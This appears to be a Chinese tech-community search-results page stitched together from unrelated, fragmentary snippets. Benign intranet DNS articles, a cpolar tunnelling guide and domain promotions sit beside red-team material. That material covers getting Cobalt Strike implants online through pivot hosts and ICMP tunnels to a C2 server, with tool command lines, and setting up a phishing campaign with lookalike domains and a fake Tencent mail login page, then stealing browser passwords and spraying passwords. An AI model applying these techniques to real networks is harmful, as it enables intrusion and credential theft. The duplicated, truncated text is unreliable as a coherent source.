点击上方“蓝字”带你去看小星星 记录几种常见的上线手法: 实验拓扑: SMB Beacon 正向连接, 目标机器必须开启 445 端口, 同时利用命名管道来执行命令,无需生成载荷,使用PsExec 或...Stageless Payload 上线。
如参考资料中《内网域名系统的安全保密风险研究》所说,“随着内网规模的不断扩大,特别是国家电子政务内网的建成、扩展,在电子政务内网中构建国家级可信内网域名体系的需求越来越迫切,内网域名系统会成为内网的核心基础设施...私有域名解析,即内网域名系统在内网安全中发挥着举足轻重的作用。 用途 笔者在实际使用 AWS、Azure、Oracle、阿里云、腾讯云、Ucloud 的过程中,也发现了私有域名解析的应用。...实践 方案一 内网私有域名解析实际上就是要在内网中搭建一台权威 DNS 和递归 DNS:权威 DNS 用于管理私有域名,递归 DNS 用于解析权威 DNS 记录以及正常的公网解析记录。...华为云文档 - 如何设置内网域名既支持内网解析,也支持公网解析?...公司内网搭建代理 DNS 使用内网域名代替 ip 地址 一文搞懂 DNS 基础知识,收藏起来有备无患~ 搞它!!!
环境 环境: windows 2008:192.168.241.171 windows 2008 x2:192.168.241.172 windows 7:192.168.241.156 0x01 内网可出网情况...首先windows7上线了,执行一波portscan ?...等上线就好 ? 0x02 内网不可出网情况 先将可出网的一台机设置中转 ? ?...等上线 ? 在上线成功的机子上可以看到是通过192.168.241.156这台机的4444端口流量出网的 ?
image.png 主机中转监听横向上线不出网域控 设置转发上线 设置监听地址和监听端口 生成无阶段木马 选择刚才新建的监听,生成木马 通过其他方式把木马上传到目标机器,并运行 仅ICMP出网上线...l :4466 -s icmpserver_ip -t c2_server_ip:9988 -tcp 1 -noprint 1 -nolog 1 CS新建监听 生成无阶段木马 监听器选择刚才创建的内网监听...上传到目标机器,运行,木马上线 ICMP出网上线cs(SPP) spp是一个简单强大的网络代理工具。...fromaddr :4466 -toaddr :9988 -proxyproto tcp -proto ricmp -nolog 1 -noprint 1 和上面新建监听器一样,也是生成无阶段木马,可成功上线
内网域名解析 内网域名解析,顾名思义是通过内网的DNS服务器在局域网内做域名解析。 内网域名解析的好处: 1、较高的性能和较低的延迟; 2、能够有效地防范外部攻击,解决劫持问题。...另外内网的网络质量是可控的,大多数情况下都比外网好些,即使不好也很容易换个比较好的设备来解决。...如何确定K8s应用的内网域名 K8s应用的内网域名是由K8s集群内部的域名解析服务来进行解析的,整个过程都在K8s集群内。...Service服务的位置见上图 上面这个Service定义YAML对应的内网域名就是: daemon-uat-chaojihao-com.ltc.svc.cluster.local 服务名[metadata.name...另外,应用的K8s内网域名是ping不通的 小技巧: 所有的K8s应用都有YAML定义文件。
,它可能由于网络协议封杀或者内网完全无网络连接造成。...在解决内网不出网的时候我们首先应该要了解隧道技术和代理技术 隧道技术 隧道技术是一种在网络中创建私密通道以在不安全或公共网络上安全传输数据的方法。...所以我们在内网协议被封杀的时候使用隧道技术。...0.0.0.0或127.0.0.1都行 将后门上传到用户主机执行 kali开启监听 成功上线 三层内网也是一样的 先添加路由 然后开启代理转发 设置代理 主机不出网,并且还有防火墙限制的情况怎么上线 这就要先说下正向连接和反向连接了...代理上线 知道了正向和反向连接我们开始绕过防火墙上线 windows_server2008和win7的上线就按上面说的方法正常上线就行,接下来上线win10 因为正向连接受到防火墙的限制,我们尝试反向连接
然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方)。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: ? 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了。
然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方)。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了。
我们攻击进入内网之后,需要通过对外服务的主机,然后使其他内网主机上线,这个时候就需要那台服务器主机作为跳板,这里我给大家讲一下如何使用cs进行操作。...首先先明确我们的一个攻击关系 hacker-------web_server--------user 我们需要通过web作为一个连接,将木马植入user,然后通过web进行代理,最后在hacker上线...我们需要先生成一个监听器 然后根据这个监听器生成一个木马 之后将这个木马通过一些方式传入user,或者内网其他机器中去,然后我们到web控制的控制台中 输入 connect 已经入侵服务器的IP 这样即可上线内网其他的主机
前言 cs上线一般情况下,都需要公网IP,但是公网IP太贵了,而且服务器上放这些都不太安全,平时用的不多,但是用的时候就又麻烦,所以这种时候可以使用内网穿透技术了。...确定你的ngrok的IP 因为我们使用的tcp的隧道,所以是可以这样搞的,ping一下我们的tcp隧道的域名。 cs客户端 启动cs的客户端然后连接上本地kali启动的cs服务器。 成功连接。...创建内网穿透的监听器 用的IP是我们隧道ping出来的,注意,这里的端口是远程的端口,而不是本地kali的端口。...创建本地shell监听器 使用监听器造马 效果 我们先选择允许,然后回到cs客户端查看是否上线成功。 可以看到成功上线,之后的cs操作我就不在各位师傅们面前班门弄斧了。...其它内网穿透工具 其它工具也是一样的
然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方)。...但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的。...内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS即可 服务器环境 192.168.1.170(开发) 192.168.1.180(测试) 192.168.1.190(预生产) 192.168.1.125...本机验证 那么如何验证这些域名可以解析到我们的内网项目,只需要修改本机dns服务器地址即可: [dns.png] 配置完成后,我们就可以通过dev.52itstyle.com等相关域名访问我们的内网项目了
极大几率邮件被退信2、腾讯企业邮优点:单次发送数量多,邮件不易被邮件服务器拦截缺点:需要配置,耗费一定的时间先看看效果腾讯企业邮搭建我搭建使用的是namesilo+cloudflare+腾讯企业邮1、买个与目标相似的域名...cloudflare添加站点计划选择免费即可这两个地址填到第一步namesilo的位置3、腾讯企业邮点击立即注册https://work.weixin.qq.com/mail/注册完成后在管理后台添加注册域名把记录填入到...钓鱼页面伪造注册一个与目标名字相似的域名,解析到VPS上,在VPS上部署一个伪造页面,这次伪造的是腾讯企业邮环境搭建:apache+php安装phpyum install php php-mysql php-gd...,很快被管理员发现异常,不过还是上线了几台机器内网上线机器后先做好权限维持,等防守人员下班再开扫,先在机器上翻翻文件,抓抓浏览器密码,推荐HackBrowserDatahttps://github.com...v4tov4 listenport=8888 listenaddress=192.168.121.132 protocol=tcpRDP登录到tomcat机器上密码喷射通过拿到的机器整理出密码本,对内网其他机器进行密码喷射推荐
从钓鱼上线到内网漫游 钓鱼 邮箱搜集 在线平台搜集,推荐两个好用的平台 https://app.snov.io/ http://www.skymem.info/ 社工钓鱼 一般钓鱼对象选取安全意识比较薄弱的岗位...腾讯企业邮 优点:单次发送数量多,邮件不易被邮件服务器拦截 缺点:需要配置,耗费一定的时间 先看看效果 腾讯企业邮搭建 我搭建使用的是namesilo+cloudflare+腾讯企业邮 1、买个与目标相似的域名...添加站点 计划选择免费即可 这两个地址填到第一步namesilo的位置 3、腾讯企业邮点击立即注册 https://work.weixin.qq.com/mail/ 注册完成后在管理后台添加注册域名...钓鱼页面伪造 注册一个与目标名字相似的域名,解析到VPS上,在VPS上部署一个伪造页面,这次伪造的是腾讯企业邮 环境搭建:apache+php 安装php yum install php php-mysql...这次演练里由于发送邮件数量较多,很快被管理员发现异常,不过还是上线了几台机器 内网 上线机器后先做好权限维持,等防守人员下班再开扫,先在机器上翻翻文件,抓抓浏览器密码,推荐HackBrowserData
文章由作者授权转载,首发于奇安信攻防社区 https://forum.butian.net/share/1955 从钓鱼上线到内网漫游 钓鱼 邮箱搜集 在线平台搜集,推荐两个好用的平台 https://...优点:单次发送数量多,邮件不易被邮件服务器拦截 缺点:需要配置,耗费一定的时间 先看看效果 腾讯企业邮搭建 我搭建使用的是 namesilo+cloudflare + 腾讯企业邮 1、买个与目标相似的域名...添加站点 计划选择免费即可 这两个地址填到第一步 namesilo 的位置 3、企业邮箱点击立即注册 https://work.weixin.qq.com/mail/ 注册完成后在管理后台添加注册域名...cloudflare 的 dns 位置,选择 MX 类型,MX 优先级保持一致即可 搭建好之后便可以开始制作钓鱼邮件了 钓鱼话术参考:主题内容贴近生活,用补贴奖品增加吸引力 钓鱼页面伪造 注册一个与目标名字相似的域名...这次演练里由于发送邮件数量较多,很快被管理员发现异常,不过还是上线了几台机器 内网 上线机器后先做好权限维持,等防守人员下班再开扫,先在机器上翻翻文件,抓抓浏览器密码,推荐 HackBrowserData
域名系统(英文:Domain Name System,缩写: DNS)是互联网的一项服务。 它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。...当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。
这里使用cpolar内网穿透来实现,创建http隧道,将内网80端口映射到公网上,无需公网IP,无需设置路由器,也无需购买云服务器。...cpolar官网:https://www.cpolar.com/ 3.1 安装cpolar内网穿透 cpolar 安装(国内使用) curl -L https://www.cpolar.com/static...配置固定二级子域名 由于使用免费cpolar所生成的公网地址为随机临时地址,24小时内会重复变化。我们可以为其配置固定的二级子域名。...进入cpolar官网并登录进入后台界面,点击左侧的预留,找到保留二级子域名,我们来为本地web站点保留一个二级子域名: 地区:选择China VIP 二级域名:可自定义 描述:即备注,可自定义 二级子域名保留成功...测试使用固定二级子域名访问本地web站点 在浏览器访问刚刚所配置成功的二级子域名,出现页面配置成功。 转载自cpolar极点云文章:Linux CentOS本地搭建web站点,并实现公网访问
2021您有一份礼物待查收 精彩活动一 「.集团、.我爱你、.biz」 新顶级域名后缀正式上线腾讯云 (点击图片点击立即选购) 精彩活动二 .love新注首年只要 25元送给你心爱的TA .love域名为新通用顶级域名...,2018年1月23日,工信部正式给予批复,.love域名的网站可以进行ICP备案,正常在国内使用。...(点击图片即可进入链接) 精彩活动三 .ART art一个后缀的白金域名 top1个后缀批量注册优惠 .ART将于2月24日UTC时间11时整点起,在全球同时投放3035个优质域名,其中多数域名仅为2...机会窗口有限,先到先得哦~ .ART不仅仅是与.COM,.ORG同级别的顶级国际互联网域名,更具有彰显独特性与创意力的属性。...区别于已成为传统的域名,.ART被称为新顶级域( New gTLD),在欧美市场开放也不过才三年时间,渐成为艺术,潮流,创意,乃至时尚界的关注热点。
PAG 启用全新域名 并上线官方论坛功能 。...PAG【全新官网域名】与【官方论坛】目前已正式上线,详情如下: PAG 官网访问大提速,全面启用新域名 全新域名:https://pag.art/ 由于旧域名存在无法备案以及无法使用网络加速服务等问题...,即日起 PAG 官网域名永久变更为唯一的 pag.art 域名变更后一切功能不受影响,访问旧域名会自动跳转最新域名,并且网站访问速度和稳定性会有显著提升,欢迎大家前来体验!...另外,别忘了更新和保存收藏新的域名地址哦:) 高效解决使用问题,PAG 论坛正式上线 论坛地址:https://bbs.pag.art/ 从 PAG 开源以来,一直只有 QQ 群交流的方式进行问题答疑...为了更好地促进 PAG 开源社区的健康发展,方便相关知识点的沉淀和检索,我们在 PAG 官网上线了论坛相关的功能。
茅台已经越来越受中国消费者喜爱,继在天猫设立官方旗舰店之后,茅台云商官方旗舰店也正式全面上线。据说茅台此举意在“铁腕控价”,打压黄牛囤货倒卖,将好酒真正卖给消费者。...茅台云商的官网启用了域名cmaotai.com。看到这域名小编倒是有点意外。好歹茅台是堂堂国酒,股票价格也是屡创新高,用的竟是一个普通的组合域名... ...此外,茅台旗下还有一个名为“茅台商城”的网站,启用的域名为emaotai.cn。
如果是自己配置AD,实现内网域名解析转发太容易了直接一句命令搞定dnscmd /ZoneAdd tencentyun.com /Forwarder 183.60.82.98...,那就添加内网域名解析到hosts或者参考如下方法配置。...添加内网域名解析到hosts,如下代码存储为.bat文件执行set datemine=%date:~0,4%%date:~5,2%%date:~8,2%echo;%time:~0,1%|find " "...hostsecho 169.254.0.138 notify.tat.tencent-cloud.com>> c:\windows\system32\drivers\etc\hosts利用bind实现内网域名解析走内网默认...修改默认内网DNS会导致内网域名解析出问题,影响云监控和云安全组件正常工作,还会影响Windows激活等涉及内网域名的服务。
领取专属 10元无门槛券
手把手带您无忧上云